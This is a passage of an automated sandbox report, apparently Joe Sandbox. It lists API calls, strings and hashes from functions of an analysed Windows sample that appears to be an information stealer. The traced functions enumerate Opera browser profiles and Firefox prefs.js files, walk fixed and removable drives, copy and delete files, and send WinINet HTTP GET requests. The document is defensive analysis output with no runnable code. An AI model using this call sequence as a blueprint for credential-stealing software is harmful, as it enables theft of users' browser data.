                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
                                                                                                                                                                                      • String ID: Opera$Opera Crypto$Opera GX$\*.*$d5$f5
                                                                                                                                                                                      • API String ID: 3824151033-1914358469
                                                                                                                                                                                      • Opcode ID: 724f5c62ced53280bb70d210d7a6dc5eeb60c017a56d20708e9c8a771d7dafc3
                                                                                                                                                                                      • Instruction ID: 2390dde4b4448b64ff566c5ed12efeab65391644504b389c1d678e59c44c1ca1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 724f5c62ced53280bb70d210d7a6dc5eeb60c017a56d20708e9c8a771d7dafc3
                                                                                                                                                                                      • Instruction Fuzzy Hash: A902E771900118AADF16FBA4DC96EEE77B8BF15304F4005A5F906AE091FE34BB49CB91
                                                                                                                                                                                      Function 0034502A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 158networkfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
                                                                                                                                                                                        • Part of subcall function 00343EF3: lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
                                                                                                                                                                                        • Part of subcall function 00343EF3: InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034507A
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 0034508E
                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003450B1
                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 003450E7
                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0034510B
                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00345116
                                                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000000), ref: 00345134
                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003451AE
                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003451B9
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 003451C2
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 003451CB
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                      • String ID: ERROR$GET
                                                                                                                                                                                      • API String ID: 3863758870-3591763792
                                                                                                                                                                                      • Opcode ID: 113a9d0bc4bba50d7737c00a848bceb299006f3c763adbfd15fa397caa447919
                                                                                                                                                                                      • Instruction ID: 77a176effc2423d344cb443b12bc0cc013cff22e623ae9253e1dd0cddbfb3281
                                                                                                                                                                                      • Opcode Fuzzy Hash: 113a9d0bc4bba50d7737c00a848bceb299006f3c763adbfd15fa397caa447919
                                                                                                                                                                                      • Instruction Fuzzy Hash: A7512872900109AFEF12EBE0DC85EFE7BBCEB05344F548165F506EA191EB74AE458B60
                                                                                                                                                                                      Function 003538DD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 124stringfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • wsprintfA.USER32 ref: 003538FA
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00353911
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258), ref: 00353933
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254), ref: 0035394D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,00000104,?,00000104), ref: 00353982
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 00353995
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 003539A9
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 003539B9
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0035E264), ref: 003539CB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 003539DF
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                        • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00353A68
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00353A77
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectOpenReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                                      • API String ID: 1795740556-4073750446
                                                                                                                                                                                      • Opcode ID: 04d89bab7b8d09589153aca0d1c3fe720db5f503c279a1d03705bb7cf137fd8c
                                                                                                                                                                                      • Instruction ID: ad851bc35dfc8d9d65f97cc1694fd04bb9bbdbaf8cf2565584dbc227c6ee2990
                                                                                                                                                                                      • Opcode Fuzzy Hash: 04d89bab7b8d09589153aca0d1c3fe720db5f503c279a1d03705bb7cf137fd8c
                                                                                                                                                                                      • Instruction Fuzzy Hash: DC410DB690411CABCF12EBF0DD49DDE77BCAF45305F0444A6F50AE6050EA35E78A8BA1
                                                                                                                                                                                      Function 0034AAF6 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 256fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003614B4,0035E266,?,?,0035E266), ref: 0034AB59
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258,?,?,0035E266), ref: 0034AB77
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254,?,?,0035E266), ref: 0034AB91
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,0035E264,?,?,0035E266,?,?,0035E266), ref: 0034AC08
                                                                                                                                                                                        • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034ACC8
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0034AD6E
                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,0035E266), ref: 0034ADFE
                                                                                                                                                                                      • FindClose.KERNEL32(?,?,?,0035E266), ref: 0034AE0F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                      • String ID: d5$f5$prefs.js
                                                                                                                                                                                      • API String ID: 893096357-1426651227
                                                                                                                                                                                      • Opcode ID: aa33513b6c37398c9d5176382c46d1ef8cf54a1371da98d6d5ce7d14d5752525
                                                                                                                                                                                      • Instruction ID: f44289a67f141dbbf0aacff1bc79268987f1956d8d23f13f433056d0326a63ef
                                                                                                                                                                                      • Opcode Fuzzy Hash: aa33513b6c37398c9d5176382c46d1ef8cf54a1371da98d6d5ce7d14d5752525
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D915A71D00108ABDB26FBB4DC96DEE77B8BF15304F404565F906AE092FE30AA49CA91
                                                                                                                                                                                      Function 003536A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 144stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00353706
                                                                                                                                                                                      • memset.MSVCRT ref: 00353725
                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 0035372E
                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0035374E
                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0035376C
                                                                                                                                                                                        • Part of subcall function 003532CD: wsprintfA.USER32 ref: 003532EC
                                                                                                                                                                                        • Part of subcall function 003532CD: FindFirstFileA.KERNEL32(?,?), ref: 00353303
                                                                                                                                                                                        • Part of subcall function 003532CD: memset.MSVCRT ref: 0035331C
                                                                                                                                                                                        • Part of subcall function 003532CD: memset.MSVCRT ref: 0035332A
                                                                                                                                                                                        • Part of subcall function 003532CD: StrCmpCA.SHLWAPI(?,0035E258), ref: 0035334D
                                                                                                                                                                                        • Part of subcall function 003532CD: StrCmpCA.SHLWAPI(?,0035E254), ref: 00353367
                                                                                                                                                                                        • Part of subcall function 003532CD: wsprintfA.USER32 ref: 0035338B
                                                                                                                                                                                        • Part of subcall function 003532CD: StrCmpCA.SHLWAPI(?,0035E266), ref: 0035339C
                                                                                                                                                                                        • Part of subcall function 003532CD: wsprintfA.USER32 ref: 003533C2
                                                                                                                                                                                        • Part of subcall function 003532CD: memset.MSVCRT ref: 003533E8
                                                                                                                                                                                        • Part of subcall function 003532CD: lstrcatA.KERNEL32(?,?), ref: 003533FA
                                                                                                                                                                                        • Part of subcall function 003532CD: strtok_s.MSVCRT ref: 0035342B
                                                                                                                                                                                        • Part of subcall function 003532CD: memset.MSVCRT ref: 00353440
                                                                                                                                                                                        • Part of subcall function 003532CD: lstrcatA.KERNEL32(?,?), ref: 00353455
                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 0035378F
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 003537F1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memset$lstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                                                                                                                      • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                      • API String ID: 1581841332-147700698
                                                                                                                                                                                      • Opcode ID: 74869cacbdc4adedbe47d4921d559806a94464eb76ef725a01cb5ee31589fd76
                                                                                                                                                                                      • Instruction ID: da9133365e24d6cb717de6a24fd9b67d93c13890f4c1623579a4af5faed909b0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 74869cacbdc4adedbe47d4921d559806a94464eb76ef725a01cb5ee31589fd76
                                                                                                                                                                                      • Instruction Fuzzy Hash: D64144B1900248BFDF36EFB0DD85DEE3BACAF04395F404415B9099A062DA30AB49C7A0
                                                                                                                                                                                      Function 0034E8FE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0035E266,00361678,003613FC,00361ECC), ref: 0034E91E
                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 0034E92C
                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0034E936
                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0034E95B
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 0034E9DB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                      • API String ID: 507856799-4001269591
                                                                                                                                                                                      • Opcode ID: 03d752b7e247c4cce3f68032e13bbfba955dd81f6c5d33e954c0f4be41ab23ec
                                                                                                                                                                                      • Instruction ID: 28e16ea48ac8b081de5973b4ebc7be55458419aaa54e2943b863c57ebe8da939
                                                                                                                                                                                      • Opcode Fuzzy Hash: 03d752b7e247c4cce3f68032e13bbfba955dd81f6c5d33e954c0f4be41ab23ec
                                                                                                                                                                                      • Instruction Fuzzy Hash: 67212771900218ABDB11EBE4DC89EEE77BCFB88350F508065F905AA181DB38EE45CB61
                                                                                                                                                                                      Function 0034F237 Relevance: 9.1, APIs: 6, Instructions: 71commemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _EH_prolog.MSVCRT ref: 0034F23C
                                                                                                                                                                                      • CoCreateInstance.OLE32(00362790,00000000,00000001,003618C0,?,00361678,00000000,00361ECC), ref: 0034F266
                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0034F273
                                                                                                                                                                                      • _wtoi64.MSVCRT ref: 0034F2AE
                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0034F2C9
                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0034F2D0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
